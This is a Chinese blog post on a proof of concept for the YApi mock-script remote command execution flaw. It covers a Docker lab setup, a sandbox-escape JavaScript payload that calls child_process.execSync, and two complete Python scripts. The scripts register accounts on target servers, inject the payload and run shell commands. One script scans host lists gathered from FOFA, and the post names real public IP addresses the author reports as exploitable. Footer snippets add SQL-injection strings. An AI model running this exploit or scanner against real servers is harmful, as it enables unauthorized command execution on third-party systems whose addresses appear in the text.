编写Poc:Yapi远程命令执行漏洞

最新推荐文章于 2024-03-20 20:26:28 发布
最新推荐文章于 2024-03-20 20:26:28 发布
阅读量896 收藏
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/soldi_er/article/details/118672818
版权

文章目录

使用Docker构建Yapi(Ubuntu环境)

  (1)创建mongoDB数据卷:

docker volume create mongo_data_yapi

  (2)启动MongoDb

docker run -d --name mongo-yapi -v mongo_data_yapi:/data/db mongo

  (3)从阿里云仓库获取yapi镜像

docker pull registry.cn-hangzhou.aliyuncs.com/anoy/yapi

  (4)初始化Yapi数据库索引,以及管理员账号

# 初始化管理员账号成功,账号名:"admin@admin.com",密码:"ymfe.org"
docker run -it --rm  --link mongo-yapi:mongo  --entrypoint npm  --workdir /api/vendors  registry.cn-hangzhou.aliyuncs.com/anoy/yapi  run install-server

  (5)创建yapi容器并启动

docker run -d  --name yapi  --link mongo-yapi:mongo  --workdir /api/vendors  -p 3000:3000  registry.cn-hangzhou.aliyuncs.com/anoy/yapi  server/app.js

  通过ip:3000访问yapi服务。

访问yapi镜像,测试漏洞

  (1)进入镜像

docker exec -it 32a744965b59097cbe03042c2a9bc4c95dcc48e2a0b904a73ab57396facb01e8 /bin/sh

  查看ip地址

ip address				# 172.17.0.3/16

  配置Tunnelblick,使用Mac宿主机访问docker靶场成功。

  (2)手动添加项目和接口,输入脚本,成功执行命令。

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami").toString()

在这里插入图片描述

自动化探测脚本

FOFA批量探测(python3)
# -*- coding: utf-8 -*-

import json
import requests


group_id = ''
project_id = ''
catid = ''
unique = ''

import random
def random_str():   # 生成3位的随机字符串,避免注册邮箱和用户名重复
    randomStr = ""
    strData = 'abcdefghijklmnopqrstuvwxyz'
    randomStr += random.choice(strData) + random.choice(strData) + random.choice(strData)
    return randomStr


def be_register(url):
    global unique
    url = url + "/api/user/reg"
    header = {
        'Content-Type': 'application/json;charset=utf-8'
    }
    unique = random_str()

    data = '{"email":"' + unique + 'test@163.com","password":"test", "username":"' + unique + 'test"}'
    try:
        print(url)
        res = requests.post(url=url, headers=header, data=data, timeout=5)
        print(res.text)
        print(res.status_code)
        if '"errmsg":"成功!' in res.text:
            return 1
        else:
            print(url + " 111not support register.")
    except:
        print(url + " 222not support register.")

session = requests.Session()


def login(url):
    url = url + "/api/user/login"
    header = {
        'Content-Type': 'application/json;charset=utf-8'
    }
    data = '{"email":"' + unique + 'test@163.com","password":"test"}'

    logingo = session.post(url=url, headers=header, data=data)
    # print(logingo.text)

def add(gurl):
    global group_id, project_id, catid
    header = {
        'Content-Type': 'application/json;charset=utf-8'
    }
    turl = gurl + "/api/group/get_mygroup"
    t1 = session.get(url=turl, timeout=5)
    group_id = json.loads(t1.text)['data']['_id']
    url1 = gurl + "/api/project/add"
    data1 = '{"name":"1","basepath":"/1","group_id":"' + str(
        group_id) + '","icon":"code-o","color":"green","project_type":"private"}'
    add1 = session.post(url=url1, headers=header, data=data1, timeout=5)
    turl2 = gurl + "/api/project/list?group_id=" + str(group_id) + "&page=1&limit=10"
    t2 = session.get(url=turl2, timeout=5)
    project_id = json.loads(t2.text)['data']['list'][0]['_id']
    turl3 = gurl + "/api/interface/list_menu?project_id=" + str(project_id) + ""
    t3 = session.get(url=turl3, timeout=5)
    catid = json.loads(t3.text)['data'][0]['_id']
    url2 = gurl + "/api/interface/add"
    data2 = '{"method":"GET","catid":"' + str(catid) + '","title":"1","path":"/1","project_id":' + str(project_id) + '}'
    # print(data1)

    add2 = session.post(url=url2, headers=header, data=data2, timeout=5)


def run(gurl, exec):
    turl = gurl + "/api/interface/list?page=1&limit=20&project_id=" + str(project_id) + ""
    t1 = session.get(url=turl, timeout=5)
    interface_id = json.loads(t1.text)['data']['list'][0]['_id']
    url = gurl + "/api/plugin/advmock/save"
    data = '''{"project_id":"''' + str(project_id) + '''","interface_id":"''' + str(
        interface_id) + '''","mock_script":"const sandbox = this\\nconst ObjectConstructor = this.constructor\\nconst FunctionConstructor = ObjectConstructor.constructor\\nconst myfun = FunctionConstructor('return process')\\nconst process = myfun()\\nmockJson = process.mainModule.require(\\"child_process\\").execSync(\\"''' + exec + '''\\").toString()","enable":true}'''
    header = {
        'Content-Type': 'application/json;charset=utf-8'
    }

    cmd = session.post(url=url, data=data, headers=header, timeout=5)
    # print(cmd.text)
    result = requests.get(url=gurl + "/mock/" + str(project_id) + "/1/1", timeout=5)
    if(("eth0" in result.text) or ("root" in result.text)):
        print("===============>存在漏洞:" + gurl + "/mock/" + str(project_id) + "/1/1")
    else:
        print("=====不存在漏洞" + gurl + "/mock/" + str(project_id) + "/1/1")

def be_connect(url):
    try:
        requests.get(url, timeout=5)
        return 1
    except:
        print(url + " 无法连接")

if __name__ == '__main__':
    session = requests.Session()
    exec = 'whoami & ifconfig || ipconfig'

    with open('FOFA_Yapi_1-11.txt', 'r') as f:
        mylist = f.read()
        mylist = mylist.split('\n')
        f.close()

        for url in mylist:
            if "http" not in url:
                url = "http://" + url
            if(be_connect(url) == 1):
                if(be_register(url) == 1):
                    login(url)
                    try:
                        add(url)
                        run(url, exec)
                    except:
                        print("add/run函数错误"+ url)

# 误报率很高:
# Not support register :http://52.80.250.134:3005。手工测试,存在漏洞。
# 还有一些是可以注册,但是运行报告称:不支持注册。

'''
存在漏洞:

自动检测
http://123.14.120.254:14000/api/plugin/advmock/save

手测:
http://52.80.250.134:3005
http://1.117.246.169:3000
http://47.119.175.250:3001/mock/195/test/test

新脚本测试100站点:
===============>存在漏洞:http://1.117.139.96:3000/mock/31/1/1
===============>存在漏洞:http://122.112.140.186:3001/mock/218/1/1
===============>存在漏洞:http://114.116.97.101:3000/mock/137/1/1

'''

# 点击mock链接可能报错:{"errcode":400,"errmsg":"解析出错,请检查。Error: Cannot read property 'require' of undefined","data":null}
单url探测(python2)
#! -*- coding:utf-8 -*-

import sys
from sys import path;path.append("..")
from lib.DDRequests import DDRequests,ddheaders
from lib.log import log
import requests
import random
import json

def random_str():   # 生成3位的随机字符串,避免注册邮箱和用户名重复
    randomStr = ""
    strData = 'abcdefghijklmnopqrstuvwxyz'
    randomStr += random.choice(strData) + random.choice(strData) + random.choice(strData)
    return randomStr

def be_register(url):
    global unique
    url = url + "/api/user/reg"
    header = {
        "Content-Type": "application/json;charset=UTF-8"
    }
    unique = random_str()
    data = '{"email":"' + unique + 'test@163.com","password":"test", "username":"' + unique + 'test"}'
    try:
        # res = requests.post(url=url, headers=header, data=data, proxies=proxies, timeout=5)
        res = requests.post(url=url, data=data, headers=header, timeout=5)
        flag = res.content.find('成功')
        if flag != -1:
            return 1
        else:
            log("[Yapi_Remote Command Execute] %s is not exists 真没有" % (url), "Info")
    # except Exception:
    except ZeroDivisionError, reason:
        log("[Yapi_Remote Command Execute] %s is not exists 异常导致没有" % (url), "Info")

session = requests.Session()

def login(url):
    url = url + "/api/user/login"
    header = {
        'Content-Type': 'application/json;charset=utf-8'
    }
    data = '{"email":"' + unique + 'test@163.com","password":"test"}'

    logingo = session.post(url=url, headers=header, data=data)
    # print(logingo.text)

def add(gurl):
    global group_id, project_id, catid
    header = {
        'Content-Type': 'application/json;charset=utf-8'
    }
    turl = gurl + "/api/group/get_mygroup"
    t1 = session.get(url=turl, timeout=5)
    group_id = json.loads(t1.text)['data']['_id']
    url1 = gurl + "/api/project/add"
    data1 = '{"name":"1","basepath":"/1","group_id":"' + str(
        group_id) + '","icon":"code-o","color":"green","project_type":"private"}'
    add1 = session.post(url=url1, headers=header, data=data1, timeout=5)
    turl2 = gurl + "/api/project/list?group_id=" + str(group_id) + "&page=1&limit=10"
    t2 = session.get(url=turl2, timeout=5)
    project_id = json.loads(t2.text)['data']['list'][0]['_id']
    turl3 = gurl + "/api/interface/list_menu?project_id=" + str(project_id) + ""
    t3 = session.get(url=turl3, timeout=5)
    catid = json.loads(t3.text)['data'][0]['_id']
    url2 = gurl + "/api/interface/add"
    data2 = '{"method":"GET","catid":"' + str(catid) + '","title":"1","path":"/1","project_id":' + str(project_id) + '}'
    # print(data1)

    add2 = session.post(url=url2, headers=header, data=data2, timeout=5)


def run(gurl, Myexec):
    WEAK_RESULT_DICT = {

        "type_f": "webweak",
        "data": "",
        "url": "",
        "resp_header": "",
        "resp_body": "",
    }
    turl = gurl + "/api/interface/list?page=1&limit=20&project_id=" + str(project_id) + ""
    t1 = session.get(url=turl, timeout=5)
    interface_id = json.loads(t1.text)['data']['list'][0]['_id']
    url = gurl + "/api/plugin/advmock/save"
    data = '''{"project_id":"''' + str(project_id) + '''","interface_id":"''' + str(
        interface_id) + '''","mock_script":"const sandbox = this\\nconst ObjectConstructor = this.constructor\\nconst FunctionConstructor = ObjectConstructor.constructor\\nconst myfun = FunctionConstructor('return process')\\nconst process = myfun()\\nmockJson = process.mainModule.require(\\"child_process\\").execSync(\\"''' + Myexec + '''\\").toString()","enable":true}'''
    header = {
        'Content-Type': 'application/json;charset=utf-8'
    }

    cmd = session.post(url=url, data=data, headers=header, timeout=5)
    # print(cmd.text)
    result = requests.get(url=gurl + "/mock/" + str(project_id) + "/1/1", timeout=5)
    # print gurl + "/mock/" + str(project_id) + "/1/1"

    code = result.status_code
    content = result.text


    if(("eth0" in result.text) or ("root" in result.text)):
        log("[Yapi_Remote Command Execute] %s is exists" % (gurl + "/mock/" + str(project_id) + "/1/1"), "Warning")
        # print("===============>存在漏洞:" + gurl + "/mock/" + str(project_id) + "/1/1")
        WEAK_RESULT_DICT["url"] = gurl + "/mock/" + str(project_id) + "/1/1"
        WEAK_RESULT_DICT["data"] = content
        WEAK_RESULT_DICT["resp_header"] = result.headers
        WEAK_RESULT_DICT["resp_body"] = result.text
        return WEAK_RESULT_DICT

    # else:
    #     log("[Yapi_Remote Command Execute] %s is not exists" % (url), "Info")
    #     # print("=====不存在漏洞" + gurl + "/mock/" + str(project_id) + "/1/1")


def crack(type_, domain, ip, port):

    # 定义要返回的字典
    WEAK_RESULT_DICT = {

        "type_f": "webweak",
        "data": "",
        "url": "",
        "resp_header": "",
        "resp_body": "",
    }

    url = type_ + "://" + domain + ":" + str(port)
    Myexec = 'whoami & ifconfig || ipconfig'
    try:
        if be_register(url):
            try:
                login(url)
                add(url)
                WEAK_RESULT_DICT = run(url, Myexec)
            except:
                log("[Yapi_Remote Command Execute] %s is not exists" % (url), "Info")
    except:
        log("[Yapi_Remote Command Execute] %s is not exists" % (url), "Info")

    return WEAK_RESULT_DICT


if __name__ == "__main__":
    # crack(sys.argv[1], sys.argv[2], sys.argv[2], sys.argv[3])
    # crack("http", "122.112.140.186", "122.112.140.186", "3001")

    # 测试用例:
    crack("http", "182.254.246.76", "182.254.246.76", "8082")

  脚本运行效果如下。
在这里插入图片描述

参考

  《Yapi远程命令执行漏洞》,2021-07
https://mp.weixin.qq.com/s/BegDH04rbVAGQ_uDSihSZg。

区块链市场观察家
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
java poc_无回显命令执行PoC编写指南(Apache Shiro Java反序列化)
weixin_32058991的博客
02-16 655
无回显漏洞存在与否,无法从web获取到标志性的信息,Java反序列化漏洞即属于该类型。验证方法针对无回显的命令执行漏洞,让目标机执行wget、nc或者curl等命令,然后在公网主机监听对应的端口,通过日志来判断命令是否被执行。该方法可行,不过缺陷有以下几点:修改了目标机的文件系统不具有通用性,如windows没有nc、linux没有wget的情况。涉及到TCP数据传输,执行速度慢一种更好的方式是使...
手工SQL注入流程与常用语句_sql注入 手工(2),34岁网络安全开发大叔感慨
最新发布
2401_83974173的博客
04-16 675
1’ and (select count(*) from information_schema.tables where table_schema=database() group by concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e,floor(rand(0)*2)))# 通过修改limit后面数字一个一个爆表。
命令执行poc编写
公众号shadow sock7
06-03 1082
有回显的情况下,碰到可能存在的windows和linux平台,可以执行一个不存在的命令,然后报错返回里有Cannot run program即可。 Windows: 结果:
【严重】Strapi <4.5.6 远程代码执行漏洞POC)(CVE-2023-22621)
murphysec的博客
04-28 1525
Strapi是Node.js开发的开源内容管理系统,Users-Permission 插件的电子邮件模板系统用于管理与用户权限相关的电子邮件通知(默认启用)。 Strapi 4.5.6之前版本中,Users-Permission 插件的电子邮件模板系统存在 SSTI(服务器端模板注入)漏洞,有权访问 Strapi 管理面板的攻击者可在电子邮件模板分隔符(例如 )中插入恶意 JavaScript 代码,当 API 账户注册时,系统会加载电子邮件模板发送电子邮件,同时将执行攻击者可
YAPI开源接口管理平台远程代码执行漏洞复现
我是小小白的博客
07-09 421
YAPI开源接口管理平台远程代码执行漏洞复现 前言 该漏洞环境为本地搭建,本博客所有文章,仅供研究测试及学习IT技术之用,严禁传播和用于非法用途,否则所产生的一切后果由观看文章、视频的人自行承担;本博客网以及发帖人不承担任何责任! 漏洞详情 YAPI接口管理平台是国内某旅行网站的开源项目,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。 该漏洞存在于YAPI的mock脚本服务上,是由于mock脚本自定义服务未对JS脚本加以命令过滤,用户可以添加任何请求处理脚本,攻击者
Chrome浏览器远程代码执行0Day漏洞风险通告——POC已公开
MachineGunJoe666
04-13 433
国外安全研究员发布了Chrome浏览器远程代码执行 0Day漏洞POC详情,漏洞为“严重”级别,攻击者可以利用漏洞构造特别的页面,访问该页面会造成远程代码执行。 1漏洞描述 国外安全研究员发布了Chrome远程代码执行 0Day漏洞POC详情,漏洞为“严重”级别。攻击者利用漏洞,构造一个恶意的web页面,用户访问该页面时,会造成远程代码执行。 Google Chrome是由Google开发的免费网页浏览器,大量采用Chrome内核的浏览器同样也会受此漏洞影响。 该0day漏...
CVE-2022-4510:Binwalk 远程代码执行漏洞
07-03
本文将深入探讨一个与二进制分析工具相关的安全事件,即"CVE-2022-4510:Binwalk 远程代码执行漏洞"。Binwalk是一款广泛使用的开源工具,主要用于固件分析、逆向工程和提取嵌入式系统的固件图像。这个漏洞可能导致...
apache stucts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具
04-21
检测一个url命令为 python3 CVE-2022-22954-POC.py -u http://test.com 检测多个url命令为 python3 CVE-2022-22954-POC.py -f file.txt(把url按一行一个保存到file.txt中) 结果有可能如下
向日葵远程代码执行poc.zip
04-05
向日葵远程代码执行漏洞(SUNBEAM Remote Code Execution)是网络安全领域中一个重要的安全隐患,主要涉及到向日葵远程控制软件。这个软件允许用户在不同的设备之间进行远程桌面控制、文件传输等一系列操作,但如果...
xml执行java源码-Axis-1.4-RCE-Poc:Axis<=1.4远程命令执行(RCE)POC
06-06
远程命令执行(RCE) POC 环境准备 首先下载Axis1.4 本仓库有一个打包好的axis直接解压到tomcat webapps下即可 ,web-inf/web.xml 去掉AdminServlet注释 然后,server-config.wsdd文件开启enableRemoteAdmin (本地...
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在此展示全面的技术研究:其影响、可利用的场景和缓解措施。 该漏洞已在最近的 ...
漏洞复现----34、yapi 远程命令执行漏洞
七天
06-24 1801
Yapi远程命令执行漏洞
漏洞发现-漏扫项目篇&Poc开发&Yaml语法&反链判断&不回显检测&Yaml生成
siu~
03-20 922
1、Xray&Afrog-Poc开发-环境配置&编写流程 2、Xray-Poc开发-数据回显&RCE不回显&实验室 3、Afrog-Poc开发-数据回显&RCE不回显&JDNI注入 章节点: 漏洞发现-Web&框架组件&中间件&APP&小程序&系统 扫描项目-综合漏扫&特征漏扫&被动漏扫&联动漏扫 Poc开发-Ymal语法&联动导入&项目拓展 扫描插件-Burpsuite插件&浏览器插件&自动模版
S2-001远程代码执行漏洞
yc11223344的博客
05-06 1159
漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value}进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 利用docker启动环境,在本地访问虚拟机ip:8080 出于好奇可以先进行测试一下OGNL表达式 进行提交,报错解析返回的是4,说明可以解析%{}里面的东西 也.
YAPI Mock远程代码执行漏洞
qq_17754023的博客
02-28 786
前言 YAPI接口管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业使用。 漏洞原理 YAPI项目使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务。其中mock数据通过设定固定数据返回固定内容,对于需要根据用户请求定制化响应内容的情况mock脚本通过写JS脚本的方式处理用户请求参数返回定制化内容,本次漏洞就是发生在mock脚本服务上。由于mock脚本
Apache Solr远程代码执行漏洞 (CVE-2019-0193)
锋刃科技的博客
06-25 1025
前言 Apache Solr官方发布Apache Solr存在一个远程代码执行漏洞(CVE-2019-0193),攻击者可利用dataConfig参数构造恶意请求,导致执行任意代码 影响版本 Apache Solr < 8.2.0 环境搭建 切换到solr目录 cd vulhub/solr/CVE-2019-0193 docker-compose up -d docker-compose exec solr bash bin/solr create_core -c test -d
用友漏洞php,Phpwind GET型CSRF任意代码执行漏洞公开
weixin_36285392的博客
03-29 447
这个洞其实很有意思,最可惜的地方就是其触发位置在后台,否则它将是一个绝无仅有的好洞。0x01 后台反序列化位置首先纵览整个phpwindv9,反序列化的位置很多,但基本都是从数据库里取出的,很难完全控制序列化字符串。
最后,找到三处:可恶的是,三处都在后台的Task模块下。Task模块是『任务中心』功能,只有能进入后台的用户才可以访问:随便打开一个, src/applications/task/a...
使用python+poco+夜神模拟器进行自动化测试。
热门推荐
saint_228的博客
12-10 1万+
网易最近出的一款自动化UI测试工具:Airtest [](http://airtest.netease.com/docs/cn/index.html)挺火的,还受到谷歌的推荐。我试着用了一下,感觉优缺点还是蛮明显的。对初学者来说,能用到的也就是图像识别的功能,这块做得比老牌的按键精灵弱很多。不过Airtest集合了poco框架[](https://pocoproject.org/),对熟悉pyth...
远程代码执行及反序列化漏洞
weixin_59616219的博客
12-21 864
远程代码执行及反序列化漏洞
PHP命令执行漏洞利用实战:实验与案例
在本章节中,我们将深入探讨PHP中的命令执行漏洞利用,这部分内容主要针对的是Web应用的...掌握这一知识点对于任何从事Web开发和安全的人来说都是至关重要的,因为有效防止命令执行漏洞能够显著提升应用程序的安全性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值